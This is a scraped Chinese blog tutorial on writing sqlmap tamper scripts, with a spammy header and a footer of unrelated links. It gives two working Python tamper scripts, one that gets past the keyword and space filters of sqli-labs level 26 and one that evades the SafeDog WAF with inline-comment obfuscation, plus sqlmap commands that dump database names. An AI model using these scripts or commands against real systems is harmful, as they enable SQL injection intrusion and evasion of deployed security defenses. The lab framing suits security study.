当前位置: 首页 > news >正文

深圳网站的公司代码网站有哪些

深圳网站的公司,代码网站有哪些,网站无障碍建设规定,网站建设排名公司哪家好文章目录 tamper脚本是什么#xff1f;指定tamper脚本运行sqlmap安全狗绕过tamper脚本 tamper脚本是什么#xff1f; SQLMap 是一款SQL注入神器#xff0c;可以通过tamper 对注入payload 进行编码和变形#xff0c;以达到绕过某些限制的目的。但是有些时候#xff0c;SQLM… 文章目录 tamper脚本是什么指定tamper脚本运行sqlmap安全狗绕过tamper脚本 tamper脚本是什么 SQLMap 是一款SQL注入神器可以通过tamper 对注入payload 进行编码和变形以达到绕过某些限制的目的。但是有些时候SQLMap 自带的Tamper 脚本并不是特别好用需要根据实际情况定制Tamper 脚本。 sqlmap的编写语言也是pythontamper脚本能增强sqlmap的功能达到绕过检测的目的。 指定tamper脚本运行sqlmap 在kali中用下面命令查找sqlmap所在的目录 find / -name sqlmap如图查找成功 下面是一个简单的tamper脚本它将关键字#、and、or和空格都做了替换and、or双写大小写绕过加上(?i)忽略大小写以sqli-labs第26关为例经过测试这关会过滤空格and、or和空格需要做双写和大小写绕过 import refrom lib.core.enums import PRIORITY__priority__ PRIORITY.HIGHESTdef dependencies():passdef tamper(payload, **kwargs):space %a0and anANDd-- and 1or oORrpayload re.sub(r(?i)#, and 1,payload)payload re.sub(r(?i)and,anANDd,payload)payload re.sub(r(?i)or,oORr,payload)payload re.sub(r(?i)\ ,%a0,payload)return payload将这段代码放入一个sqli-labs_26.py中并将文件放到sqlmap所在的目录 运行xampp打开sqli-labs_26复制路径 然后在kali中输入下面命令运行sqlmap -tamper指定运行的tamper脚本 –current-db列出当前数据库 -u指定url -v 指定sqlmap的回显等级 –dbs 列出所有的数据库 python3 sqlmap -u http://10.9.75.164/sqli-labs/Less-26/?id2 -v3 -tamper sqli-labs_26.py --current-db如下图获取到数据库的名称为security类型为联合查询 安全狗绕过tamper脚本 绕过安全狗 1.脏数据 2.大小写转换 3.双写 4.内联注释 安装安全狗以sqli-labs第1关为例绕过安全狗应该从上面4个方面考虑经过测试只有第四个方法可行下面是一个内联注释的脚本 import refrom lib.core.enums import PRIORITY__priority__ PRIORITY.HIGHESTdef dependencies(): passdef tamper(payload, **kwargs): payload re.sub(r(?i)and, /*!14400and*/, payload)payload re.sub(r(?i)order by, /**/order/*/%0a*a*/by/**/, payload)payload re.sub(r(?i)union select, union/*!88888cas*//*/%0a*a*/select/**/, payload) payload re.sub(r(?i)union all select, union/*!88888cas*//*/%0a*a*/select/**/, payload)payload re.sub(r(?i)from information_schema.schemata, /*!from--%0f/*%0ainformation_schema.schemata*/, payload)payload re.sub(r(?i)from information_schema.tables, /*!from--%0f/*%0ainformation_schema.tables*/, payload)payload re.sub(r(?i)from information_schema.columns, /*!from--%0f/*%0ainformation_schema.columns*/, payload)payload re.sub(r(?i)database\(\), database(/*!/*/**%0fAJEST*/*/), payload)#payload re.sub(r(?i)count\(*\),count(1),payload)payload re.sub(r(?i) as,/*!14400as*/,payload)payload re.sub(r(?i)char,/*!14400char*/,payload)return payload和之前获取数据库名称一样将该脚本文件放到sqlmap所在目录下: 然后用下面命令运行sqlmap获取数据库名称 python3 sqlmap -u http://10.9.75.116/sqli-labs/Less-1/?id1 -v3 --tamper safedog.py --random-agent --dbs如图用该脚本文件做tamper绕过安全狗绕waf成功获得数据库名称
http://www.hkea.cn/news/14338230/

相关文章:

  • 昊杰南宫网站建设企业网站必备模块
  • phpcms v9 网站建设设计制作网络科技模板杭州行业网页设计公司
  • 北京做网站公司排界面做的最好的网站
  • 怎样搭建个人网站北京传媒公司
  • 莞城仿做网站网站模板套用湖南岚鸿
  • 企业网站改版新闻如何让百度收录自己的网站信息
  • 什么是交互式网站开发南昌网站设计哪个最好
  • 网站建设多少钱 小江网页设计德州网站建设哪一家好
  • 北海市建设局官方网站苏州网页关键词优化
  • 中文网站建设英文网站备案多少钱
  • 网站平台开发公司你了解网站建设吗 软文案例
  • 淮南网站建设公司为网站的特色功能设计各种模板
  • 网站怎么显示被kwordpress VIP账号插件
  • 网站建设合同的注意事项株洲网站建设公司
  • WordPress搭建手机网站简历免费模板可编辑word
  • 微小店网站建设平台wordpress 英文站赚钱
  • tp框架做展示网站网站怎么做才能得到更好的优化
  • 网站开发过程模型个人怎么找猎头公司推荐自己
  • 企业网站用织梦好吗西安有啥好玩的地方
  • 网站开发费用如何入账c#购物网站开发流程
  • 用什么IE打开建设银行网站给实体店老板做的网站
  • linux 做网站用哪个版本飞猪旅游的网站建设
  • 产品网站推广wordpress cufon
  • 企业内部网站模板下载泽成杭州seo网站推广排名
  • 网站代码预览器微博推广文案范文
  • 太原电商网站设计免费网站建设可信吗
  • 做一个商城网站软件首页设计
  • 如何创建个人网站国外做文化的网站
  • 国内网站建设发展大连制作网站公司
  • 温州网站制作计划东莞网站建设优化方案